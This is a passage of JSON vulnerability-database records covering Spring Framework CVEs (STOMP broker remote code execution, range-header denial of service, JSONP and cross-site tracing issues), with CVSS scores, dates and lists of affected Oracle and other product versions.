"cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:application_testing_suite:13.1.0.1", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:endeca_information_discovery_integrator:3.1.0", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.2.8191", "cpe:/a:oracle:flexcube_private_banking:12.0.1.0", "cpe:/a:oracle:agile_product_lifecycle_management:9.3.5", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:utilities_network_management_system:1.12.0.3", "cpe:/a:oracle:mysql_enterprise_monitor:4.0.6.5281", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:micros_lucas:2.9.5", "cpe:/a:oracle:retail_predictive_application_server:15.0.3.100", "cpe:/a:oracle:endeca_information_discovery_integrator:3.2.0", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:retail_predictive_application_server:14.0.3.26", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:hospitality_guest_access:4.2.1", "cpe:/a:oracle:communications_unified_inventory_management:7.3.5", "cpe:/a:oracle:insurance_calculation_engine:11.3.1", "cpe:/a:oracle:hospitality_guest_access:4.2.0", "cpe:/a:oracle:agile_product_lifecycle_management:9.3.4", "cpe:/a:oracle:retail_predictive_application_server:16.0"], "id": "CVE-2018-11040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:flexcube_private_banking:12.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_markdown_optimization:13.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:micros_lucas:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:2.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:12.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_network_management_system:1.12.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_product_lifecycle_management:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3.100:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0.3.26:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.2.8191:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:3.4.9.4237:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:2.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:product_lifecycle_management:9.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:11.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager:13.2:*:*:*:*:mysql:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.6.5281:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:51", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-06T13:29:00", "type": "cve", "title": "CVE-2018-1270", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2022-06-23T16:31:00", "cpe": ["cpe:/a:oracle:retail_order_broker:15.0", "cpe:/a:oracle:big_data_discovery:1.6.0", "cpe:/a:redhat:fuse:1.0.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:retail_integration_bus:16.0.1", "cpe:/a:oracle:retail_integration_bus:14.0.1", "cpe:/a:oracle:insurance_rules_palette:11.1", "cpe:/a:oracle:retail_integration_bus:14.1.3", "cpe:/a:oracle:retail_central_office:14.1", "cpe:/a:oracle:retail_point-of-sale:14.0", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:primavera_gateway:17.12", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:retail_integration_bus:15.0.0.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:goldengate_for_big_data:12.3.2.1", "cpe:/a:oracle:retail_integration_bus:15.0.1", "cpe:/a:oracle:retail_point-of-sale:14.1", "cpe:/a:oracle:retail_integration_bus:16.0.2", "cpe:/a:oracle:retail_order_broker:16.0", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:retail_central_office:14.0", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:application_testing_suite:13.1.0.1", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:retail_predictive_application_server:15.0", "cpe:/a:oracle:retail_integration_bus:14.0.4", "cpe:/a:oracle:retail_order_broker:5.2", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:retail_integration_bus:14.1.2", "cpe:/a:oracle:retail_integration_bus:14.1.1", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:primavera_gateway:16.2", "cpe:/a:oracle:retail_returns_management:14.1", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0", "cpe:/a:oracle:retail_back_office:14.1", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:retail_order_broker:5.1", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:goldengate_for_big_data:12.3.1.1", "cpe:/a:oracle:retail_open_commerce_platform:6.0.1", "cpe:/a:oracle:retail_integration_bus:16.0", "cpe:/a:oracle:retail_integration_bus:14.0.2", "cpe:/a:oracle:retail_returns_management:14.0", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:retail_back_office:14.0", "cpe:/a:oracle:retail_integration_bus:14.0.3", "cpe:/a:oracle:health_sciences_information_manager:3.0", "cpe:/a:oracle:retail_integration_bus:15.0.2", "cpe:/a:oracle:goldengate_for_big_data:12.2.0.1", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:retail_predictive_application_server:14.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:retail_open_commerce_platform:6.0.0", "cpe:/a:oracle:retail_open_commerce_platform:5.3.0", "cpe:/a:oracle:primavera_gateway:15.2", "cpe:/a:oracle:retail_predictive_application_server:14.0", "cpe:/a:oracle:retail_predictive_application_server:16.0"], "id": "CVE-2018-1270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1270", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:big_data_discovery:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-sale:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:fuse:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-sale:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:53", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-11T13:29:00", "type": "cve", "title": "CVE-2018-1275", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2022-06-23T16:35:00", "cpe": ["cpe:/a:oracle:retail_order_broker:15.0", "cpe:/a:oracle:big_data_discovery:1.6.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0", "cpe:/a:oracle:insurance_rules_palette:11.1", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:primavera_gateway:17.12", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:goldengate_for_big_data:12.3.2.1", "cpe:/a:oracle:retail_order_broker:16.0", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:retail_predictive_application_server:15.0", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:application_testing_suite:13.1.0.1", "cpe:/a:oracle:retail_order_broker:5.2", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:primavera_gateway:16.2", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:retail_order_broker:5.1", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:goldengate_for_big_data:12.3.1.1", "cpe:/a:oracle:retail_open_commerce_platform:6.0.1", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:health_sciences_information_manager:3.0", "cpe:/a:oracle:goldengate_for_big_data:12.2.0.1", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:retail_predictive_application_server:14.1", "cpe:/a:oracle:retail_open_commerce_platform:6.0.0", "cpe:/a:oracle:retail_open_commerce_platform:5.3.0", "cpe:/a:oracle:primavera_gateway:15.2", "cpe:/a:oracle:retail_predictive_application_server:14.0", "cpe:/a:oracle:retail_predictive_application_server:16.0"], "id": "CVE-2018-1275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1275", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:big_data_discovery:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0:*:*:*:*:*:*:*"]}], "github": [{"lastseen": "2023-02-01T05:08:30", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-15T19:34:50", "type": "github", "title": "Denial of Service in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2023-02-01T05:03:01", "id": "GHSA-FFVQ-7W96-97P7", "href": "https://github.com/advisories/GHSA-ffvq-7w96-97p7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-01T05:08:47", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-16T17:35:54", "type": "github", "title": "Moderate severity vulnerability that affects org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2023-02-01T05:03:47", "id": "GHSA-9GCM-F4X3-8JPW", "href": "https://github.com/advisories/GHSA-9gcm-f4x3-8jpw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-01T05:08:47", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the \"jsonp\" and \"callback\" JSONP parameters, enabling cross-domain requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-16T17:43:45", "type": "github", "title": "Moderate severity vulnerability that affects org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2023-02-01T05:03:39", "id": "GHSA-F26X-PR96-VW86", "href": "https://github.com/advisories/GHSA-f26x-pr96-vw86", 